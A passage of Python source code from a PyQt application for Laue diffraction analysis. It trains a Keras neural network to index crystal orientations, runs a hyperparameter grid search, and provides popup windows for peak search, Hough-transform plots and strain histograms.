self.load_dataset(material_=self.material_, material1_=self.material1_, ang_maxx=self.maximum_angle_to_search,
step=self.step_for_binning, mode=self.mode_of_analysis,
nb_grains=self.nb_grains_per_lp,
grains_nb_simulate=self.grains_nb_simulate//self.factor,
data_realism = True, detectorparameters=self.detectorparameters,
pixelsize=self.pixelsize, type_="testing_data", var0=0,
dim1=self.input_params["dim1"], dim2=self.input_params["dim2"], removeharmonics=1)
## write MTEX data with training orientation
try:
write_training_testing_dataMTEX(self.save_directory,self.material_,self.material1_,
self.lattice_material,self.lattice_material1,
material0_lauegroup, material1_lauegroup)
except:
print("Error writing the MTEX file of training and testing data")
self.write_to_console("Error writing the MTEX file of training and testing data")
if self.generate_additional_data:
print("In development; generating a combination of existing dataset")
self.status.showMessage("Training dataset generation completed with multi CPUs!")
rmv_freq_class(self.freq_rmv, self.elements, self.freq_rmv1, self.elements1,\
self.save_directory, self.material_, self.material1_, self.write_to_console,\
self.progress, QApplication)
self.write_to_console("See the class occurances above and choose appropriate frequency removal parameter to train quickly the network by having few output classes!, if not continue as it is.")
self.write_to_console("Press Train network button to Train")
self.train_nn.setEnabled(True)
self.timermp.stop()
def train_neural_network(self,):
self.status.showMessage("Neural network training in progress!")
self.train_nn.setEnabled(False)
rmv_freq_class(self.freq_rmv, self.elements, self.freq_rmv1, self.elements1,\
self.save_directory, self.material_, self.material1_, self.write_to_console,\
self.progress, QApplication)
self.classhkl = np.load(self.save_directory+"//MOD_grain_classhkl_angbin.npz")["arr_0"]
self.angbins = np.load(self.save_directory+"//MOD_grain_classhkl_angbin.npz")["arr_1"]
self.loc_new = np.load(self.save_directory+"//MOD_grain_classhkl_angbin.npz")["arr_2"]
with open(self.save_directory+"//class_weights.pickle", "rb") as input_file:
class_weights = cPickle.load(input_file)
self.class_weights = class_weights[0]
## load model and train
self.model = model_arch_general(len(self.angbins)-1, len(self.classhkl),
kernel_coeff= self.kernel_coeff, bias_coeff=self.bias_coeff,
lr=self.learning_rate, write_to_console=self.write_to_console)
self.train_model()
self.trialtoolbar1.setEnabled(True)
self.predict_lnn.setEnabled(True)
self.status.showMessage("Neural network training completed!")
def train_model(self, prefix="", tag = 0):
if tag == 2:
## retraining from file
try:
self.classhkl = np.load(self.save_directory+"//MOD_grain_classhkl_angbin.npz")["arr_0"]
self.angbins = np.load(self.save_directory+"//MOD_grain_classhkl_angbin.npz")["arr_1"]
self.loc_new = np.load(self.save_directory+"//MOD_grain_classhkl_angbin.npz")["arr_2"]
with open(self.save_directory+"//class_weights.pickle", "rb") as input_file:
class_weights = cPickle.load(input_file)
self.class_weights = class_weights[0]
## the model must be recompiled when loaded from file; rebuilding it with the same architecture function is simplest
self.write_to_console("Constructing model")
self.model = model_arch_general(len(self.angbins)-1, len(self.classhkl),
kernel_coeff= self.kernel_coeff, bias_coeff=self.bias_coeff,
lr=self.learning_rate, write_to_console=self.write_to_console)
list_of_files = glob.glob(self.save_directory+'//*.h5')
latest_file = max(list_of_files, key=os.path.getctime)
self.write_to_console("Taking the latest Weight file from the Folder: " + latest_file)
load_weights = latest_file
self.model.load_weights(load_weights)
self.write_to_console("Uploading weights to model")
self.write_to_console("All model files found and loaded")
except:
self.write_to_console("Model directory is not proper or files are missing. please configure the params")
return
## quick check of the number of spots and class IDs present in one batch
batch_size = self.input_params["batch_size"]
trainy_inbatch = array_generator_verify(self.save_directory+"//training_data", batch_size,
len(self.classhkl), self.loc_new, self.write_to_console)
self.write_to_console("Number of spots in a batch of %i files : %i" %(batch_size, len(trainy_inbatch)))
self.write_to_console("Min, Max class ID is %i, %i" %(np.min(trainy_inbatch), np.max(trainy_inbatch)))
# try varying batch size and epochs
epochs = self.input_params["epochs"]
## Batch loading for numpy grain files (Keep low value to avoid overcharging the RAM)
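# steps_per_epoch ~= (number of simulated Laue patterns) / batch_size; the validation generator
# uses self.factor times fewer steps, matching the smaller testing dataset generated above.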
if self.material_ != self.material1_:
nb_grains_list = list(range(self.nb_grains_per_lp+1))
nb_grains1_list = list(range(self.nb_grains_per_lp1+1))
list_permute = list(itertools.product(nb_grains_list, nb_grains1_list))
list_permute.pop(0)
steps_per_epoch = (len(list_permute) * self.grains_nb_simulate)//batch_size
else:
steps_per_epoch = int((self.nb_grains_per_lp * self.grains_nb_simulate) / batch_size)
val_steps_per_epoch = int(steps_per_epoch / self.factor)
if steps_per_epoch == 0:
steps_per_epoch = 1
if val_steps_per_epoch == 0:
val_steps_per_epoch = 1
## Load generator objects from filepaths
training_data_generator = array_generator(self.save_directory+"//training_data", batch_size, \
len(self.classhkl), self.loc_new, self.write_to_console)
testing_data_generator = array_generator(self.save_directory+"//testing_data", batch_size, \
len(self.classhkl), self.loc_new, self.write_to_console)
######### TRAIN THE DATA
self.progress.setMaximum(epochs*steps_per_epoch)
# from clr_callback import CyclicLR
# clr = CyclicLR(base_lr=0.0005, max_lr=0.001, step_size=steps_per_epoch*5, mode='triangular')
es = EarlyStopping(monitor='val_accuracy', mode='max', patience=2)
# es = EarlyStopping(monitor='categorical_crossentropy', patience=2)
ms = ModelCheckpoint(self.save_directory+"//best_val_acc_model.h5", monitor='val_accuracy',
mode='max', save_best_only=True)
# model save directory and filename
if self.material_ != self.material1_:
model_name = self.save_directory+"//model_"+self.material_+"_"+self.material1_+prefix
else:
model_name = self.save_directory+"//model_"+self.material_+prefix
log = LoggingCallback(self.write_to_console, self.progress, QApplication, self.model, model_name)
stats_model = self.model.fit(
training_data_generator,
epochs=epochs,
steps_per_epoch=steps_per_epoch,
validation_data=testing_data_generator,
validation_steps=val_steps_per_epoch,
verbose=1,
class_weight=self.class_weights,
callbacks=[es, ms, log] # es, ms, clr
)
self.progress.setValue(epochs*steps_per_epoch)
QApplication.processEvents()
# Save model config and weights
if tag == 0:
## new trained model, save files
model_json = self.model.to_json()
with open(model_name+".json", "w") as json_file:
json_file.write(model_json)
# serialize weights to HDF5
self.model.save_weights(model_name+".h5")
self.write_to_console("Saved model to disk")
self.write_to_console( "Training Accuracy: "+str( stats_model.history['accuracy'][-1]))
self.write_to_console( "Training Loss: "+str( stats_model.history['loss'][-1]))
self.write_to_console( "Validation Accuracy: "+str( stats_model.history['val_accuracy'][-1]))
self.write_to_console( "Validation Loss: "+str( stats_model.history['val_loss'][-1]))
epochs = range(1, len(self.model.history.history['loss']) + 1)
fig, ax = plt.subplots(1,2)
ax[0].plot(epochs, self.model.history.history['loss'], 'r', label='Training loss')
ax[0].plot(epochs, self.model.history.history['val_loss'], 'r', ls="dashed", label='Validation loss')
ax[0].legend()
ax[1].plot(epochs, self.model.history.history['accuracy'], 'g', label='Training Accuracy')
ax[1].plot(epochs, self.model.history.history['val_accuracy'], 'g', ls="dashed", label='Validation Accuracy')
ax[1].legend()
if self.material_ != self.material1_:
plt.savefig(self.save_directory+"//loss_accuracy_"+self.material_+"_"+self.material1_+prefix+".png", bbox_inches='tight',format='png', dpi=1000)
else:
plt.savefig(self.save_directory+"//loss_accuracy_"+self.material_+prefix+".png", bbox_inches='tight',format='png', dpi=1000)
plt.close()
if self.material_ != self.material1_:
text_file = open(self.save_directory+"//loss_accuracy_logger_"+self.material_+"_"+self.material1_+prefix+".txt", "w")
else:
text_file = open(self.save_directory+"//loss_accuracy_logger_"+self.material_+prefix+".txt", "w")
text_file.write("# EPOCH, LOSS, VAL_LOSS, ACCURACY, VAL_ACCURACY" + "\n")
for inj in range(len(epochs)):
string1 = str(epochs[inj]) + ","+ str(self.model.history.history['loss'][inj])+\
","+str(self.model.history.history['val_loss'][inj])+","+str(self.model.history.history['accuracy'][inj])+\
","+str(self.model.history.history['val_accuracy'][inj])+" \n"
text_file.write(string1)
text_file.close()
x_test, y_test = vali_array(self.save_directory+"//testing_data", 50, len(self.classhkl), self.loc_new,
self.write_to_console)
y_test = np.argmax(y_test, axis=-1)
y_pred = np.argmax(self.model.predict(x_test), axis=-1)
self.write_to_console(classification_report(y_test, y_pred))
self.write_to_console( "Training is Completed; You can use the Retrain function to run for more epoch with varied batch size")
self.write_to_console( "Training is Completed; You can use the Prediction and Live Prediction module now")
def grid_search_hyperparams(self,):
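# Coarse grid search over learning rate, bias- and kernel-regularization coefficients
# (values 1e-1 .. 1e-6 each, 216 combinations): every combination is trained for a single epoch
# and its train/validation accuracy and loss are appended to parameter_hypergrid_<material>.txt.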
classhkl = np.load(self.save_directory+"//MOD_grain_classhkl_angbin.npz")["arr_0"]
angbins = np.load(self.save_directory+"//MOD_grain_classhkl_angbin.npz")["arr_1"]
loc_new = np.load(self.save_directory+"//MOD_grain_classhkl_angbin.npz")["arr_2"]
with open(self.save_directory+"//class_weights.pickle", "rb") as input_file:
class_weights = cPickle.load(input_file)
class_weights = class_weights[0]
batch_size = self.input_params["batch_size"]
trainy_inbatch = array_generator_verify(self.save_directory+"//training_data", batch_size,
len(classhkl), loc_new, self.write_to_console)
self.write_to_console("Number of spots in a batch of %i files : %i" %(batch_size, len(trainy_inbatch)))
self.write_to_console("Min, Max class ID is %i, %i" %(np.min(trainy_inbatch), np.max(trainy_inbatch)))
self.write_to_console("Starting hypergrid optimization: looking in a grid to optimize the learning rate and regularization coefficients.")
# try varying batch size and epochs
epochs = 1 #self.input_params["epochs"]
## Batch loading for numpy grain files (Keep low value to avoid overcharging the RAM)
steps_per_epoch = int((self.nb_grains_per_lp * self.grains_nb_simulate)/batch_size)
val_steps_per_epoch = int(steps_per_epoch /self.factor)
if steps_per_epoch == 0:
steps_per_epoch = 1
if val_steps_per_epoch == 0:
val_steps_per_epoch = 1
## Load generator objects from filepaths
training_data_generator = array_generator(self.save_directory+"//training_data", batch_size, \
len(classhkl), loc_new, self.write_to_console)
testing_data_generator = array_generator(self.save_directory+"//testing_data", batch_size, \
len(classhkl), loc_new, self.write_to_console)
# grid search values
values = [1e-1, 1e-2, 1e-3, 1e-4, 1e-5, 1e-6]
all_train, all_test = list(), list()
all_trainL, all_testL = list(), list()
parameters = list()
text_file = open(self.save_directory+"//parameter_hypergrid_"+self.material_+".txt", "w")
text_file.write("# Iter, Learning_Rate, Bias_Coeff, Kernel_Coeff, Train_Acc, Train_Loss, Test_Acc, Test_Loss, LR_index, BC_index, KC_index" + "\n")
self.progress.setMaximum(len(values)*len(values)*len(values))
iter_cnt= 0
for i, param in enumerate(values):
for j, param1 in enumerate(values):
for k, param2 in enumerate(values):
# define model
iter_cnt += 1
model = model_arch_general(len(angbins)-1, len(classhkl),
kernel_coeff = param2,
bias_coeff = param1,
lr = param, verbose=0,
write_to_console=self.write_to_console)
# fit model
stats_model = model.fit(
training_data_generator,
epochs=epochs,
steps_per_epoch=steps_per_epoch,
validation_data=testing_data_generator,
validation_steps=val_steps_per_epoch,
verbose=0,
class_weight=class_weights,
)
# evaluate the model
train_acc = stats_model.history['accuracy'][-1]
test_acc = stats_model.history['val_accuracy'][-1]
train_loss = stats_model.history['loss'][-1]
test_loss = stats_model.history['val_loss'][-1]
all_train.append(train_acc)
all_test.append(test_acc)
all_trainL.append(train_loss)
all_testL.append(test_loss)
parameters.append([param,param1,param2])
string1 = str(iter_cnt) +","+ str(param) + ","+ str(param1)+\
","+str(param2)+","+str(train_acc)+\
","+str(train_loss)+ ","+str(test_acc)+","+str(test_loss)+","+ str(i) + ","+ str(j)+\
","+str(k)+ " \n"
text_file.write(string1)
self.progress.setValue(iter_cnt)
QApplication.processEvents()
text_file.close()
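# Small matplotlib canvas helpers embedded in the Qt GUI: MplCanvas holds 3 (or 4) side-by-side
# axes, MplCanvas1 a single axes, and MplCanvas2 a 2x3 grid of axes.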
class MplCanvas(FigureCanvas):
def __init__(self, parent=None, width=5, height=4, dpi=100, subplot=1, mat_bool=True):
self.fig = Figure(figsize=(width, height), dpi=dpi)
if mat_bool:
self.axes = self.fig.add_subplot(131)
self.axes1 = self.fig.add_subplot(132)
self.axes2 = self.fig.add_subplot(133)
else:
self.axes = self.fig.add_subplot(141)
self.axes1 = self.fig.add_subplot(142)
self.axes2 = self.fig.add_subplot(143)
self.axes3 = self.fig.add_subplot(144)
super(MplCanvas, self).__init__(self.fig)
class MplCanvas1(FigureCanvas):
def __init__(self, parent=None, width=5, height=4, dpi=100):
self.fig = Figure(figsize=(width, height), dpi=dpi)
self.axes = self.fig.add_subplot(111)
super(MplCanvas1, self).__init__(self.fig)
class MplCanvas2(FigureCanvas):
def __init__(self, parent=None, width=5, height=4, dpi=100):
self.fig = Figure(figsize=(width, height), dpi=dpi)
self.axes = self.fig.add_subplot(231)
self.axes1 = self.fig.add_subplot(232)
self.axes2 = self.fig.add_subplot(233)
self.axes3 = self.fig.add_subplot(234)
self.axes4 = self.fig.add_subplot(235)
self.axes5 = self.fig.add_subplot(236)
super(MplCanvas2, self).__init__(self.fig)
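# Interactive single-image window: displays a raw or background-corrected detector image with
# min/max intensity sliders, runs LaueTools peak search and the neural-network prediction with
# user-tunable parameters, shows Hough-transform diagnostics, and can propagate the tuned
# parameters back to settings.ini.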
class MyPopup_image_v1(QWidget):
def __init__(self, ix, iy, file, data, ccd_label, function_predict, image_no, detectorparameters):
QWidget.__init__(self)
self.layout = QVBoxLayout() # QGridLayout()
self.canvas = MplCanvas1(self, width=10, height=10, dpi=100)
self.toolbar = NavigationToolbar(self.canvas, self)
self.iy,self.ix,self.file = iy, ix, file
self.ccd_label = ccd_label
self.data = data
self.pix_x, self.pix_y = [], []
self.scatter = None
self.function_predict = function_predict
self.image_no = image_no
self.detectorparameters = detectorparameters
# set the layout
self.layout.addWidget(self.toolbar, 0)
self.layout.addWidget(self.canvas, 100)
self.ImaxDisplayed = 2*np.average(data)
self.IminDisplayed = np.average(data) - 0.2*np.average(data)
self.slider = QSlider(QtCore.Qt.Horizontal, self)
self.slider.setRange(0, np.max(data))
self.layout.addWidget(self.slider)
self.slider.setValue(self.IminDisplayed)
self.slider.valueChanged[int].connect(self.sliderMin)
self.slider1 = QSlider(QtCore.Qt.Horizontal, self)
self.slider1.setRange(10, np.max(data))
self.layout.addWidget(self.slider1)
self.slider1.setValue(self.ImaxDisplayed)
self.slider1.valueChanged[int].connect(self.sliderMax)
self.bkg_treatment = QLineEdit()
self.bkg_treatment.setText("A-B")
self.peak_params = QLineEdit()
self.peak_params.setText("500,15,15")
self.predict_params = QLineEdit()
self.predict_params.setText("0.85, 0.20, v2, 8, 0.2, 50")
try:
config_setting = configparser.ConfigParser()
filepath = resource_path('settings.ini')
config_setting.read(filepath)
residues_threshold = float(config_setting.get('CALLER', 'residues_threshold'))
nb_spots_global_threshold = int(config_setting.get('CALLER', 'nb_spots_global_threshold'))
option_global = config_setting.get('CALLER', 'option_global')
nb_spots_consider = int(config_setting.get('CALLER', 'nb_spots_consider'))
intensity_threshold = int(float(config_setting.get('CALLER', 'intensity')))
boxsize = int(float(config_setting.get('CALLER', 'boxsize')))
FitPixelDev_global123 = int(float(config_setting.get('CALLER', 'pixdev')))
softmax_threshold_global123 = float(config_setting.get('CALLER', 'cap_softmax'))
cap_matchrate123 = float(config_setting.get('CALLER', 'cap_mr'))
strain_free_parameters = config_setting.get('CALLER', 'strain_free_parameters').split(",")
additional_expression = config_setting.get('CALLER', 'additional_expression').split(",")
if intensity_threshold is not None and boxsize is not None and FitPixelDev_global123 is not None:
self.peak_params.setText(str(intensity_threshold)+","+str(boxsize)+","+str(FitPixelDev_global123))
self.predict_params.setText(str(float(softmax_threshold_global123))+","+str(float(cap_matchrate123))+
","+option_global+","+
str(nb_spots_global_threshold)+","+str(residues_threshold)+
","+str(nb_spots_consider))
self.residues_threshold = residues_threshold
self.nb_spots_global_threshold = nb_spots_global_threshold
self.option_global = option_global
self.nb_spots_consider = nb_spots_consider
self.intensity_threshold = intensity_threshold
self.boxsize = boxsize
self.FitPixelDev_global123 = FitPixelDev_global123
self.softmax_threshold_global123 = softmax_threshold_global123
self.cap_matchrate123 = cap_matchrate123
self.strain_free_parameters = strain_free_parameters
self.additional_expression = additional_expression
except:
self.residues_threshold = 0.5
self.nb_spots_global_threshold = 8
self.option_global = "v2"
self.nb_spots_consider = 100
self.intensity_threshold = 200
self.boxsize = 15
self.FitPixelDev_global123 = 15
self.softmax_threshold_global123 = 0.85
self.cap_matchrate123 = 0.2
self.strain_free_parameters = ["rotx", "roty", "rotz", "alpha", "beta", "gamma", "b", "c"]
self.additional_expression = ["none"]
print("error with setting config file")
self.corrected_data = None
self.image_mode = QComboBox()
mode_ = ["raw","bkg_corrected"]
for s in mode_:
self.image_mode.addItem(s)
self.btn_peak_search = QPushButton("Peak search")
self.btn_peak_search.clicked.connect(self.peak_search)
self.predicthkl = QPushButton("run prediction")
self.predicthkl.clicked.connect(self.prediction_hkl)
self.plothough = QPushButton("Show hough transform results")
self.plothough.clicked.connect(self.plot_houghlines)
self.refresh_plot = QPushButton("Refresh plot")
self.refresh_plot.clicked.connect(self.refresh_plots)
self.propagate_button = QPushButton("Propagate values")
self.propagate_button.clicked.connect(self.propagate)
self.btn_peak_search.setEnabled(True)
self.predicthkl.setEnabled(False)
self.propagate_button.setEnabled(False)
self.plothough.setEnabled(False)
## add some buttons here for peak search and peak options
## and then predict again with neural network with its options
## send the data back to update the main variables
formLayout = QFormLayout()
formLayout.addRow('Background treatment expression', self.bkg_treatment)
formLayout.addRow('Intensity; box size; pix dev', self.peak_params)
formLayout.addRow('Image mode', self.image_mode)
formLayout.addRow('softmax acc.; Mr threshold; 4hyperparams', self.predict_params)
formLayout.addRow(self.btn_peak_search, self.predicthkl)
formLayout.addRow(self.refresh_plot, self.plothough)
formLayout.addRow("Propagate the new parameters", self.propagate_button)
self.layout.addLayout(formLayout)
self.setLayout(self.layout)
# compute background
self.show_bkg_corrected_img()
self.draw_something()
def refresh_plots(self):
self.draw_something()
def show_bkg_corrected_img(self):
backgroundimage = ImProc.compute_autobackground_image(self.data, boxsizefilter=10)
self.corrected_data = ImProc.computefilteredimage(self.data, backgroundimage, self.ccd_label, usemask=True,
formulaexpression=self.bkg_treatment.text())
def propagate(self):
config_setting1 = configparser.ConfigParser()
filepath = resource_path('settings.ini')
print("Settings path is "+filepath)
config_setting1.read(filepath)
config_setting1.set('CALLER', 'residues_threshold',str(self.residues_threshold))
config_setting1.set('CALLER', 'nb_spots_global_threshold',str(self.nb_spots_global_threshold))
config_setting1.set('CALLER', 'option_global',self.option_global)
config_setting1.set('CALLER', 'use_om_user',"false")
config_setting1.set('CALLER', 'nb_spots_consider',str(self.nb_spots_consider))
config_setting1.set('CALLER', 'path_user_OM',"")
config_setting1.set('CALLER', 'intensity', str(self.intensity_threshold))
config_setting1.set('CALLER', 'boxsize', str(self.boxsize))
config_setting1.set('CALLER', 'pixdev', str(self.FitPixelDev_global123))
config_setting1.set('CALLER', 'cap_softmax', str(self.softmax_threshold_global123))
config_setting1.set('CALLER', 'cap_mr', str(self.cap_matchrate123))
config_setting1.set('CALLER', 'strain_free_parameters', ",".join(self.strain_free_parameters))
config_setting1.set('CALLER', 'additional_expression', ",".join(self.additional_expression))
with open(filepath, 'w') as configfile:
config_setting1.write(configfile)
print("Config settings updated")
def neighbor_UB(self):
#TODO
print("UB matrix indexation from neighbors in development")
pass
def plot_houghlines(self):
print("Plotting Hough lines")
s_ix = np.argsort(self.peakXY[:, 2])[::-1]
self.peakXY = self.peakXY[s_ix]
pixelsize = dictLT.dict_CCD[self.ccd_label][1]
twicetheta, chi = Lgeo.calc_uflab(self.peakXY[:,0], self.peakXY[:,1], self.detectorparameters,
returnAngles=1,
pixelsize=pixelsize,
kf_direction='Z>0')
# Classic straight-line Hough transform
imageGNO, nbpeaks, halfdiagonal = computeGnomonicImage(twicetheta, chi)
hough, theta_h, d_h = hough_line(imageGNO)
# Generating figure 1
fig, axes = plt.subplots(1, 3, figsize=(15, 6))
ax = axes.ravel()
ax[0].imshow(self.data,interpolation="nearest",vmin=self.IminDisplayed, vmax=self.ImaxDisplayed)
ax[0].set_title('Input image')
ax[0].set_axis_off()
ax[1].imshow(np.log(1 + hough),
extent=[np.rad2deg(theta_h[-1]), np.rad2deg(theta_h[0]), d_h[-1], d_h[0]],
cmap=cm.gray, aspect=1/1.5)
ax[1].set_title('Hough transform')
ax[1].set_xlabel('Angles (degrees)')
ax[1].set_ylabel('Distance (pixels)')
ax[1].axis('image')
ax[2].imshow(imageGNO, cmap=cm.gray)
for _, angle, dist in zip(*hough_line_peaks(hough, theta_h, d_h)):
y0 = (dist - 0 * np.cos(angle)) / np.sin(angle)
y1 = (dist - imageGNO.shape[1] * np.cos(angle)) / np.sin(angle)
ax[2].plot((0, imageGNO.shape[1]), (y0, y1), '-r', lw=0.5)
ax[2].set_xlim((0, imageGNO.shape[1]))
ax[2].set_ylim((imageGNO.shape[0], 0))
ax[2].set_axis_off()
ax[2].set_title('Detected lines')
plt.tight_layout()
plt.show()
def peak_search(self):
self.propagate_button.setEnabled(False)
intens = int(float(self.peak_params.text().split(",")[0]))
bs = int(float(self.peak_params.text().split(",")[1]))
pixdev = int(float(self.peak_params.text().split(",")[2]))
bkg_treatment = self.bkg_treatment.text()
try:
peak_XY = RMCCD.PeakSearch(
self.file,
stackimageindex = -1,
CCDLabel=self.ccd_label,
NumberMaxofFits=5000,
PixelNearRadius=10,
removeedge=2,
IntensityThreshold=intens,
local_maxima_search_method=0,
boxsize=bs,
position_definition=1,
verbose=0,
fit_peaks_gaussian=1,
xtol=0.001,
FitPixelDev=pixdev,
return_histo=0,
MinIntensity=0,
PeakSizeRange=(0.65,200),
write_execution_time=1,
Data_for_localMaxima = "auto_background",
formulaexpression=bkg_treatment,
Remove_BlackListedPeaks_fromfile=None,
reject_negative_baseline=True,
Fit_with_Data_for_localMaxima=False,
maxPixelDistanceRejection=15.0,
)
peak_XY = peak_XY[0]
self.pix_x, self.pix_y = peak_XY[:,0], peak_XY[:,1]
self.peakXY = peak_XY
except:
print("Error in Peak detection for "+ self.file)
self.pix_x, self.pix_y = [], []
self.peakXY = []
self.draw_something()
self.predicthkl.setEnabled(True)
self.plothough.setEnabled(True)
def prediction_hkl(self):
try:
intens = int(float(self.peak_params.text().split(",")[0]))
bs = int(float(self.peak_params.text().split(",")[1]))
pixdev = int(float(self.peak_params.text().split(",")[2]))
smt = float(self.predict_params.text().split(",")[0])
mrt = float(self.predict_params.text().split(",")[1])
nb_spots_consider_global123 = int(float(self.predict_params.text().split(",")[5]))
residues_threshold123 = float(self.predict_params.text().split(",")[4])
option_global123 = self.predict_params.text().split(",")[2]
nb_spots_global_threshold123 = int(float(self.predict_params.text().split(",")[3]))
self.residues_threshold = residues_threshold123
self.nb_spots_global_threshold = nb_spots_global_threshold123
self.option_global = option_global123
self.nb_spots_consider = nb_spots_consider_global123
self.intensity_threshold = intens
self.boxsize = bs
self.FitPixelDev_global123 = pixdev
self.softmax_threshold_global123 = smt
self.cap_matchrate123 = mrt
self.function_predict(self.file, intens, bs, pixdev, smt, mrt, self.image_no, nb_spots_consider_global123,
residues_threshold123, option_global123, nb_spots_global_threshold123, self.peakXY,
self.strain_free_parameters,self.additional_expression)
self.propagate_button.setEnabled(True)
except:
print("Error during prediction; reinitialize the optimize window again, most probably this will fix it")
def draw_something(self):
# Drop off the first y element, append a new one.
self.canvas.axes.cla()
self.canvas.axes.set_title("Laue pattern of pixel x=%d, y=%d (file: %s)"%(self.iy,self.ix,self.file), loc='center', fontsize=8)
self.canvas.axes.set_ylabel(r'Y pixel',fontsize=8)
self.canvas.axes.set_xlabel(r'X pixel', fontsize=8)
if self.image_mode.currentText() == "raw":
self.canvas.axes.imshow(self.data,interpolation="nearest",vmin=self.IminDisplayed, vmax=self.ImaxDisplayed)
else:
self.canvas.axes.imshow(self.corrected_data,interpolation="nearest",vmin=self.IminDisplayed, vmax=self.ImaxDisplayed)
if len(self.pix_x)!=0:
self.canvas.axes.scatter(self.pix_x, self.pix_y, s=120, facecolor='none', edgecolor='r', label="Peaks")
self.canvas.draw()
def sliderMin(self, val):
try:
#slider control function
if val > self.ImaxDisplayed:
print("Min value cannot be greater than Max")
self.draw_something()
return
self.IminDisplayed= val
self.draw_something()
except:
print("Error: value", val)
def sliderMax(self, val):
try:
#slider control function
if val < self.IminDisplayed:
print("Max value cannot be less than Min")
self.draw_something()
return
self.ImaxDisplayed= val
self.draw_something()
except:
print("Error: value", val)
class MyPopup_image_v2(QWidget):
def __init__(self, matrix, title, flag=0):
QWidget.__init__(self)
app_icon = QtGui.QIcon()
app_icon.addFile(Logo, QtCore.QSize(16,16))
self.setWindowIcon(app_icon)
self.layout = QVBoxLayout() # QGridLayout()
self.canvas = MplCanvas2(self, width=10, height=10, dpi=100)
self.toolbar = NavigationToolbar(self.canvas, self)
# set the layout
self.layout.addWidget(self.toolbar, 0)
self.layout.addWidget(self.canvas, 100)
self.setLayout(self.layout)
# Drop off the first y element, append a new one.
self.canvas.axes.cla()
self.canvas.axes.set_title(title, loc='center', fontsize=10)
if flag == 0:
matrix = matrix.reshape((matrix.shape[0]*matrix.shape[1],3,3))
e11c = matrix[:,0,0]
e22c = matrix[:,1,1]
e33c = matrix[:,2,2]
e12c = matrix[:,0,1]
e13c = matrix[:,0,2]
e23c = matrix[:,1,2]
e11c = e11c.flatten()
e22c = e22c.flatten()
e33c = e33c.flatten()
e12c = e12c.flatten()
e13c = e13c.flatten()
e23c = e23c.flatten()
e11c = e11c[~np.isnan(e11c)]
e22c = e22c[~np.isnan(e22c)]
e33c = e33c[~np.isnan(e33c)]
e12c = e12c[~np.isnan(e12c)]
e13c = e13c[~np.isnan(e13c)]
e23c = e23c[~np.isnan(e23c)]
bins = 30
# try:
self.canvas.axes.set_title(r"$\epsilon_{11}$ (%)", loc='center', fontsize=10)
logdata = e11c
self.canvas.axes.hist(logdata, bins=bins, density=True, alpha=0.8)
self.canvas.axes.set_ylabel('Frequency', fontsize=8)
self.canvas.axes.tick_params(axis='both', which='major', labelsize=10)
self.canvas.axes.tick_params(axis='both', which='minor', labelsize=10)
self.canvas.axes.grid(True)
self.canvas.axes1.set_title(r"$\epsilon_{22}$ (%)", loc='center', fontsize=10)
logdata = e22c
self.canvas.axes1.hist(logdata, bins=bins, density=True, alpha=0.8)
self.canvas.axes1.set_ylabel('Frequency', fontsize=8)
self.canvas.axes1.tick_params(axis='both', which='major', labelsize=10)
self.canvas.axes1.tick_params(axis='both', which='minor', labelsize=10)
self.canvas.axes1.grid(True)
self.canvas.axes2.set_title(r"$\epsilon_{33}$ (%)", loc='center', fontsize=10)
logdata = e33c
self.canvas.axes2.hist(logdata, bins=bins, density=True, alpha=0.8)
self.canvas.axes2.set_ylabel('Frequency', fontsize=8)
self.canvas.axes2.tick_params(axis='both', which='major', labelsize=10)
self.canvas.axes2.tick_params(axis='both', which='minor', labelsize=10)
self.canvas.axes2.grid(True)
self.canvas.axes3.set_title(r"$\epsilon_{12}$ (%)", loc='center', fontsize=10)
logdata = e12c
self.canvas.axes3.hist(logdata, bins=bins, density=True, alpha=0.8)
self.canvas.axes3.set_ylabel('Frequency', fontsize=8)
self.canvas.axes3.tick_params(axis='both', which='major', labelsize=10)
self.canvas.axes3.tick_params(axis='both', which='minor', labelsize=10)
self.canvas.axes3.grid(True)
self.canvas.axes4.set_title(r"$\epsilon_{13}$ (%)", loc='center', fontsize=10)
logdata = e13c
self.canvas.axes4.hist(logdata, bins=bins, density=True, alpha=0.8)
self.canvas.axes4.set_ylabel('Frequency', fontsize=8)
self.canvas.axes4.tick_params(axis='both', which='major', labelsize=10)
self.canvas.axes4.tick_params(axis='both', which='minor', labelsize=10)
self.canvas.axes4.grid(True)
self.canvas.axes5.set_title(r"$\epsilon_{23}$ (%)", loc='center', fontsize=10)
logdata = e23c
self.canvas.axes5.hist(logdata, bins=bins, density=True, alpha=0.8)
self.canvas.axes5.set_ylabel('Frequency', fontsize=8)
self.canvas.axes5.tick_params(axis='both', which='major', labelsize=10)
self.canvas.axes5.tick_params(axis='both', which='minor', labelsize=10)
self.canvas.axes5.grid(True)
# except:
# pass
# Trigger the canvas to update and redraw.
self.canvas.draw()
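# Popup comparing experimental spots with the best-match simulated spots for one map pixel:
# hover annotations give spot indices, 2theta/chi, HKL and energy, and a text panel summarizes
# the rotation matrix, residues, linked spots and matching rate.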
class MyPopup_image(QWidget):
def __init__(self, th_exp, chi_exp, intensity, tth_sim, chi_sim, sim_energy, sim_hkl, \
ix, iy, file, exp_linkspots, residues, theo_index, rotation_matrix):
QWidget.__init__(self)
app_icon = QtGui.QIcon()
app_icon.addFile(Logo, QtCore.QSize(16,16))
self.setWindowIcon(app_icon)
self.layout = QVBoxLayout() # QGridLayout()
self.canvas = MplCanvas1(self, width=10, height=10, dpi=100)
self.toolbar = NavigationToolbar(self.canvas, self)
self.Data_X = th_exp*2.0
self.Data_Y = chi_exp
self.Data_index_expspot = list(range(len(th_exp)))
self.Data_I = intensity
self.data_theo_X = tth_sim
self.data_theo_Y = chi_sim
self.data_theo_hkl = sim_hkl
self.data_theo_energy = sim_energy
self.Data_index_simspot = list(range(len(tth_sim)))
self.iy,self.ix,self.file = iy, ix, file
# set the layout
self.layout.addWidget(self.toolbar, 0)
self.layout.addWidget(self.canvas, 100)
self.setLayout(self.layout)
# Drop off the first y element, append a new one.
self.intensity = intensity / np.amax(intensity) * 100.0
self.canvas.axes.cla()
self.canvas.axes.set_title("Laue pattern of pixel x=%d, y=%d (file: %s)"%(iy,ix,file), loc='center', fontsize=8)
self.canvas.axes.set_ylabel(r'$\chi$ (in deg)',fontsize=8)
self.canvas.axes.set_xlabel(r'2$\theta$ (in deg)', fontsize=8)
self.scatter1 = self.canvas.axes.scatter(th_exp*2.0, chi_exp, c='k', s=self.intensity, cmap="gray", label="Exp spots")
if len(tth_sim) != 0:
self.scatter = self.canvas.axes.scatter(tth_sim, chi_sim, s=120, facecolor='none', edgecolor='r', label="Best match spots")
# Trigger the canvas to update and redraw.
